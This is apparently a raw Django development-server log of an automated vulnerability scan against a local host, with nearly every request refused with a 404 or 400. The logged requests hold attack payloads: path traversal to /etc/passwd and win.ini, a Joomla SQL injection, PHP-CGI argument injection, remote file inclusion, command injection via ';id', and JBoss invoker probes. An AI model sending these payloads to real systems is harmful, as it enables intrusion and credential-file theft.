[07/Nov/2020 22:26:31] code 400, message Bad request syntax ('GET GET /cgi-bin/loadpage.cgi?user_id=1&file=../../../../../../etc/passwd HTTP/1.1')
[07/Nov/2020 22:26:31] "GET GET /cgi-bin/loadpage.cgi?user_id=1&file=../../../../../../etc/passwd HTTP/1.1" 400 -
Not Found: /scripts/loadpage.cgi
[07/Nov/2020 22:26:31] "GET /scripts/loadpage.cgi?user_id=1&file=../../../../../../etc/passwd HTTP/1.1" 404 2275
Not Found: /scripts/loadpage.cgi
[07/Nov/2020 22:26:31] "GET /scripts/loadpage.cgi?user_id=1&file=..\..\..\..\..\..\..\..\winnt\win.ini HTTP/1.1" 404 2302
Not Found: /scripts/search.cgi
[07/Nov/2020 22:26:32] "GET /scripts/search.cgi?user_id=1&database=..\..\..\..\..\..\..\..\winnt\win.ini&template=..\..\..\..\..\..\..\winnt\win.ini&distinct=1 HTTP/1.1" 404 2379
[07/Nov/2020 22:26:32] code 400, message Bad request syntax ('GET GET /scripts/loadpage.cgi?user_id=1&file=../../../../../../etc/passwd HTTP/1.1')
[07/Nov/2020 22:26:32] "GET GET /scripts/loadpage.cgi?user_id=1&file=../../../../../../etc/passwd HTTP/1.1" 400 -
Not Found: /mailsms/s
[07/Nov/2020 22:26:32] "GET /mailsms/s?func=ADMIN:appState&dumpConfig=/ HTTP/1.1" 404 2236
Not Found: /uai/download/uploadfileToPath.htm
[07/Nov/2020 22:26:34] "POST /uai/download/uploadfileToPath.htm HTTP/1.1" 404 2272
Not Found: /index.php
[07/Nov/2020 22:26:36] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1) HTTP/1.1" 404 2308
Not Found: /joomla/index.php
[07/Nov/2020 22:26:36] "GET /joomla/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1) HTTP/1.1" 404 2329
Not Found: /joomla2/index.php
[07/Nov/2020 22:26:36] "GET /joomla2/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1) HTTP/1.1" 404 2332
Not Found: /joomla3/index.php
[07/Nov/2020 22:26:36] "GET /joomla3/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1) HTTP/1.1" 404 2332
Not Found: /index.php
[07/Nov/2020 22:26:37] "GET /index.php HTTP/1.0" 404 2194
Not Found: /cgi-bin/empower
[07/Nov/2020 22:26:37] "GET /cgi-bin/empower?DB=whateverwhatever HTTP/1.1" 404 2232
Not Found: /scripts/empower
[07/Nov/2020 22:26:38] "GET /scripts/empower?DB=whateverwhatever HTTP/1.1" 404 2232
Not Found: /
[07/Nov/2020 22:26:38] "GET / HTTP/1.1" 404 2154
----------------------------------------
Exception happened during processing of request from ('192.168.199.130', 59806)
Traceback (most recent call last):
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/data2/hust_tmp/anaconda3/envs/tw/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /plus/car.php
[07/Nov/2020 22:26:39] "POST /plus/car.php HTTP/1.1" 404 2209
Not Found: /
[07/Nov/2020 22:26:39] "GET / HTTP/1.0" 404 2154
Not Found: /reports/rwservlet/showmap
[07/Nov/2020 22:26:40] "GET /reports/rwservlet/showmap HTTP/1.1" 404 2247
Not Found: /extplorer/extplorer.xml
[07/Nov/2020 22:26:40] "GET /extplorer/extplorer.xml HTTP/1.1" 404 2241
Not Found: /pls/sample/admin_/
[07/Nov/2020 22:26:41] "GET /pls/sample/admin_/ HTTP/1.1" 404 2221
Not Found: /Album/
[07/Nov/2020 22:26:43] "GET /Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0 HTTP/1.1" 404 2279
Not Found: /struts2-showcase/index.action
[07/Nov/2020 22:26:45] "GET /struts2-showcase/index.action?method:6eaKBP4V HTTP/1.1" 404 2275
Not Found: /kimai/index.php
[07/Nov/2020 22:26:46] "GET /kimai/index.php HTTP/1.1" 404 2217
Not Found: /index.php
[07/Nov/2020 22:26:46] "GET /index.php HTTP/1.1" 404 2199
Not Found: /invoker/JMXInvokerServlet
[07/Nov/2020 22:26:46] "POST /invoker/JMXInvokerServlet HTTP/1.1" 404 2248
Not Found: /invoker/EJBInvokerServlet
[07/Nov/2020 22:26:46] "POST /invoker/EJBInvokerServlet HTTP/1.1" 404 2248
Not Found: /jbossmq-httpil/HTTPServerILServlet
[07/Nov/2020 22:26:46] "POST /jbossmq-httpil/HTTPServerILServlet HTTP/1.1" 404 2275
Not Found: /invoker/readonly
[07/Nov/2020 22:26:46] "POST /invoker/readonly HTTP/1.1" 404 2221
Not Found: /SilverStream/Meta/Tables/
[07/Nov/2020 22:26:47] "GET /SilverStream/Meta/Tables/?access-mode=text HTTP/1.1" 404 2259
[07/Nov/2020 22:26:47] code 400, message Bad request syntax ('GET /phppath/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disale_functions=""+-d+open_basedir=none+-d+auto_prepend_file="<?php echo 2013*502*529)?>" HTTP/1.1')
[07/Nov/2020 22:26:47] "GET /phppath/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disale_functions=""+-d+open_basedir=none+-d+auto_prepend_file="<?php echo 2013*502*529)?>" HTTP/1.1" 400 -
Not Found: /ifx/
[07/Nov/2020 22:26:54] "GET /ifx/?LO=../../../../../etc/passwd HTTP/1.1" 404 2208
Not Found: /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php
[07/Nov/2020 22:26:55] "GET /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php?type=file&folder= HTTP/1.1" 404 2410
Not Found: /
[07/Nov/2020 22:26:56] "GET / HTTP/1.0" 404 2154
Not Found: /nx/common/cds/menu.inc.php
[07/Nov/2020 22:26:56] "GET /nx/common/cds/menu.inc.php?c_path=http://xxxxxxxx/ HTTP/1.1" 404 2269
Not Found: /SiteScope/cgi/go.exe/SiteScope
[07/Nov/2020 22:26:56] "GET /SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator HTTP/1.1" 404 2329
Not Found: /cgi-bin/nx/common/cds/menu.inc.php
[07/Nov/2020 22:26:56] "GET /cgi-bin/nx/common/cds/menu.inc.php?c_path=http://xxxxxxxx/ HTTP/1.1" 404 2293
Not Found: /scripts/nx/common/cds/menu.inc.php
[07/Nov/2020 22:26:57] "GET /scripts/nx/common/cds/menu.inc.php?c_path=http://xxxxxxxx/ HTTP/1.1" 404 2293
Not Found: /DB4Web/www.microsoft.com:23/foo
[07/Nov/2020 22:26:58] "GET /DB4Web/www.microsoft.com:23/foo HTTP/1.1" 404 2260
Not Found: /ca//\../\../\../\../\../\../\windows/\win.ini
[07/Nov/2020 22:27:00] "GET /ca//\../\../\../\../\../\../\windows/\win.ini HTTP/1.1" 404 2318
Not Found: /ca/..\..\..\..\..\..\winnt/\win.ini
[07/Nov/2020 22:27:00] "GET /ca/..\..\..\..\..\..\winnt/\win.ini HTTP/1.1" 404 2286
Not Found: //sql.php
[07/Nov/2020 22:27:00] "GET //sql.php?LIB_INC=1&btnDrop=No&goto=/etc/passwd HTTP/1.1" 404 2237
Not Found: /ca/..\..\..\..\..\..\/\etc/\passwd
[07/Nov/2020 22:27:00] "GET /ca/..\..\..\..\..\..\/\etc/\passwd HTTP/1.1" 404 2285
Not Found: /..\..\..\..\..\..\windows\win.ini
[07/Nov/2020 22:27:00] "GET ..\..\..\..\..\..\windows\win.ini HTTP/1.1" 404 1728
Not Found: /piranha/secure/control.php3
[07/Nov/2020 22:27:00] "GET /piranha/secure/control.php3? HTTP/1.1" 404 2248
Not Found: //sql.php3
[07/Nov/2020 22:27:00] "GET //sql.php3?LIB_INC=1&btnDrop=No&goto=/etc/passwd HTTP/1.1" 404 2240
Not Found: /remotehtmlview.php
[07/Nov/2020 22:27:00] "GET /remotehtmlview.php?phpAds_path=http://xxxxxxxx HTTP/1.1" 404 2249
Not Found: /piranha/secure/control.php3
[07/Nov/2020 22:27:00] "GET /piranha/secure/control.php3? HTTP/1.1" 404 2248
Not Found: /cgi-bin/remotehtmlview.php
[07/Nov/2020 22:27:00] "GET /cgi-bin/remotehtmlview.php?phpAds_path=http://xxxxxxxx HTTP/1.1" 404 2273
Not Found: /..\..\..\..\..\..\winnt\win.ini
[07/Nov/2020 22:27:00] "GET ..\..\..\..\..\..\winnt\win.ini HTTP/1.1" 404 1722
Not Found: /scripts/remotehtmlview.php
[07/Nov/2020 22:27:01] "GET /scripts/remotehtmlview.php?phpAds_path=http://xxxxxxxx HTTP/1.1" 404 2273
Not Found: /phpPgAdmin/sql.php
[07/Nov/2020 22:27:01] "GET /phpPgAdmin/sql.php?LIB_INC=1&btnDrop=No&goto=/etc/passwd HTTP/1.1" 404 2267
Not Found: /\..\..\..\windows\win.ini
[07/Nov/2020 22:27:01] "GET /%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1" 404 2252
Not Found: /\..\..\..\windows\win.ini
[07/Nov/2020 22:27:01] "GET /%5c..%5c..%5c..%5cwindows%5cwin%2eini HTTP/1.1" 404 2252
Not Found: /\..\..\..\boot.ini
[07/Nov/2020 22:27:01] "GET /%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini HTTP/1.1" 404 2229
Not Found: //../../../../../../windows/win.ini
[07/Nov/2020 22:27:01] "GET /%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini HTTP/1.1" 404 2250
Not Found: /phpPgAdmin/sql.php3
[07/Nov/2020 22:27:01] "GET /phpPgAdmin/sql.php3?LIB_INC=1&btnDrop=No&goto=/etc/passwd HTTP/1.1" 404 2270
Not Found: //../../../../../../winnt/win.ini
[07/Nov/2020 22:27:01] "GET /%2f..%2f..%2f..%2f..%2f..%2f..%2fwinnt%2fwin.ini HTTP/1.1" 404 2244
Not Found: /..../../../../../etc/passwd
[07/Nov/2020 22:27:01] "GET ../../../../../../etc/passwd HTTP/1.1" 404 1674
Not Found: /T
[07/Nov/2020 22:27:01] "GET T HTTP/1.1" 404 1611
Not Found: /T
[07/Nov/2020 22:27:01] "GET T HTTP/1.1" 404 1611
Not Found: /P
[07/Nov/2020 22:27:01] "GET P HTTP/1.1" 404 1611
Not Found: /RsasTest1768210211.html
[07/Nov/2020 22:27:01] "GET /RsasTest1768210211.html HTTP/1.1" 404 2236
Not Found: /
[07/Nov/2020 22:27:01] "GET / HTTP/1.1" 404 2149
Not Found: /admin/contextAdmin/contextList.jsp
[07/Nov/2020 22:27:01] "GET /admin/contextAdmin/contextList.jsp HTTP/1.1" 404 2269
Not Found: /1
[07/Nov/2020 22:27:01] "GET 1 HTTP/1.1" 404 1611
Not Found: /.
[07/Nov/2020 22:27:02] "GET . HTTP/1.1" 404 1611
Not Found: /1
[07/Nov/2020 22:27:02] "GET 1 HTTP/1.1" 404 1611
Not Found: /HTTP1.1
[07/Nov/2020 22:27:02] "GET   HTTP/1.1" 404 1631
Not Found: /..\pixfir~1\how_to_login.html
[07/Nov/2020 22:27:02] "GET /..\pixfir~1\how_to_login.html HTTP/1.1" 404 2258
Not Found: /HTTP1.1
[07/Nov/2020 22:27:02] "GET   HTTP/1.1" 404 1631
Not Found: /cgi-bin/sql.php
[07/Nov/2020 22:27:02] "GET /cgi-bin/sql.php?LIB_INC=1&btnDrop=No&goto=/etc/passwd HTTP/1.1" 404 2258
Not Found: /sql.php3
[07/Nov/2020 22:27:03] "GET /sql.php3?LIB_INC=1&btnDrop=No&goto=/etc/passwd HTTP/1.1" 404 2237
Not Found: /modules.php
[07/Nov/2020 22:27:03] "GET /modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid HTTP/1.1" 404 2270
Not Found: /nuke/modules.php
[07/Nov/2020 22:27:03] "GET /nuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid HTTP/1.1" 404 2285
Not Found: /h
[07/Nov/2020 22:27:03] "GET h HTTP/1.1" 404 1611
Not Found: /demo/modules.php
[07/Nov/2020 22:27:03] "GET /demo/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid HTTP/1.1" 404 2285
Not Found: /4
[07/Nov/2020 22:27:03] "GET 4 HTTP/1.1" 404 1611
Not Found: /phpnuke/html/modules.php
[07/Nov/2020 22:27:03] "GET /phpnuke/html/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid HTTP/1.1" 404 2309
Not Found: /HTTP1.1
[07/Nov/2020 22:27:03] "GET   HTTP/1.1" 404 1631
Not Found: /php_nuke/html/modules.php
[07/Nov/2020 22:27:03] "GET /php_nuke/html/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid HTTP/1.1" 404 2312
Not Found: /php/modules.php
[07/Nov/2020 22:27:04] "GET /php/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid HTTP/1.1" 404 2282
Not Found: /dev/save_restore.xml
[07/Nov/2020 22:27:04] "GET /dev/save_restore.xml HTTP/1.1" 404 2232
Not Found: /l
[07/Nov/2020 22:27:04] "GET l HTTP/1.1" 404 1611
Not Found: /o
[07/Nov/2020 22:27:04] "GET o HTTP/1.1" 404 1611
Not Found: /
[07/Nov/2020 22:27:04] "GET / HTTP/1.1" 404 2154
Not Found: /phpnew/modules.php
[07/Nov/2020 22:27:04] "GET /phpnew/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid HTTP/1.1" 404 2291
Not Found: /t
[07/Nov/2020 22:27:04] "GET t HTTP/1.1" 404 1611
Not Found: /HTTP1.1
[07/Nov/2020 22:27:04] "GET   HTTP/1.1" 404 1631
Not Found: /RsasTest1443849989.html
[07/Nov/2020 22:27:04] "GET /RsasTest1443849989.html HTTP/1.1" 404 2236
Not Found: /h
[07/Nov/2020 22:27:04] "GET h HTTP/1.1" 404 1611
Not Found: /o
Not Found: /nuke50/modules.php
[07/Nov/2020 22:27:04] "GET /nuke50/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid HTTP/1.1" 404 2291
[07/Nov/2020 22:27:04] "GET o HTTP/1.1" 404 1611
Not Found: /scripts/sql.php
[07/Nov/2020 22:27:04] "GET /scripts/sql.php?LIB_INC=1&btnDrop=No&goto=/etc/passwd HTTP/1.1" 404 2258
Not Found: /cgi-bin/search/search.cgi
Not Found: /u
[07/Nov/2020 22:27:04] "GET /cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc HTTP/1.1" 404 2314
[07/Nov/2020 22:27:04] "GET u HTTP/1.1" 404 1611
Not Found: /n
[07/Nov/2020 22:27:04] "GET n HTTP/1.1" 404 1611
Not Found: /cgi-bin/sql.php3
[07/Nov/2020 22:27:04] "GET /cgi-bin/sql.php3?LIB_INC=1&btnDrop=No&goto=/etc/passwd HTTP/1.1" 404 2261
Not Found: /d
[07/Nov/2020 22:27:04] "GET d HTTP/1.1" 404 1611
Not Found: /HTTP1.1
[07/Nov/2020 22:27:04] "GET  HTTP/1.1" 404 1631
Not Found: /cgi-bin/modules.php
[07/Nov/2020 22:27:04] "GET /cgi-bin/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid HTTP/1.1" 404 2294
Not Found: /scripts/search/search.cgi
[07/Nov/2020 22:27:04] "GET /scripts/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc HTTP/1.1" 404 2314
Not Found: /a
[07/Nov/2020 22:27:05] "GET a HTTP/1.1" 404 1611
Not Found: /D
[07/Nov/2020 22:27:05] "GET D HTTP/1.1" 404 1611
Not Found: /scripts/modules.php
[07/Nov/2020 22:27:05] "GET /scripts/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid HTTP/1.1" 404 2294
Not Found: /a
[07/Nov/2020 22:27:05] "GET a HTTP/1.1" 404 1611
Not Found: /scripts/sql.php3
[07/Nov/2020 22:27:05] "GET /scripts/sql.php3?LIB_INC=1&btnDrop=No&goto=/etc/passwd HTTP/1.1" 404 2261
Not Found: /t
[07/Nov/2020 22:27:05] "GET t HTTP/1.1" 404 1611
Not Found: /e
[07/Nov/2020 22:27:05] "GET e HTTP/1.1" 404 1611
Not Found: /:
[07/Nov/2020 22:27:05] "GET : HTTP/1.1" 404 1611
Not Found: /HTTP1.1
[07/Nov/2020 22:27:05] "GET   HTTP/1.1" 404 1631
Not Found: /search
[07/Nov/2020 22:27:06] "GET /search?NS-query-pat=..\..\..\..\..\..\..\..\winnt\win.ini HTTP/1.1" 404 2254
Not Found: /"
[07/Nov/2020 22:27:06] "GET " HTTP/1.1" 404 1623
Not Found: /search
[07/Nov/2020 22:27:06] "GET /search?NS-query-pat=../../../../../../../../../etc/passwd HTTP/1.1" 404 2236
Not Found: /a
[07/Nov/2020 22:27:06] "GET a HTTP/1.1" 404 1611
Not Found: /t
[07/Nov/2020 22:27:06] "GET t HTTP/1.1" 404 1611
Not Found: /,
[07/Nov/2020 22:27:06] "GET , HTTP/1.1" 404 1611
Not Found: /HTTP1.1
[07/Nov/2020 22:27:06] "GET   HTTP/1.1" 404 1631
Not Found: /e
[07/Nov/2020 22:27:06] "GET e HTTP/1.1" 404 1611
Not Found: /7
[07/Nov/2020 22:27:07] "GET 7 HTTP/1.1" 404 1611
Not Found: /HTTP1.1
[07/Nov/2020 22:27:07] "GET   HTTP/1.1" 404 1631
Not Found: />
[07/Nov/2020 22:27:07] "GET > HTTP/1.1" 404 1619
Not Found: /o
[07/Nov/2020 22:27:07] "GET o HTTP/1.1" 404 1611
Not Found: /v
[07/Nov/2020 22:27:07] "GET v HTTP/1.1" 404 1611
Not Found: /HTTP1.1
[07/Nov/2020 22:27:07] "GET   HTTP/1.1" 404 1631
Not Found: /<
[07/Nov/2020 22:27:07] "GET < HTTP/1.1" 404 1619
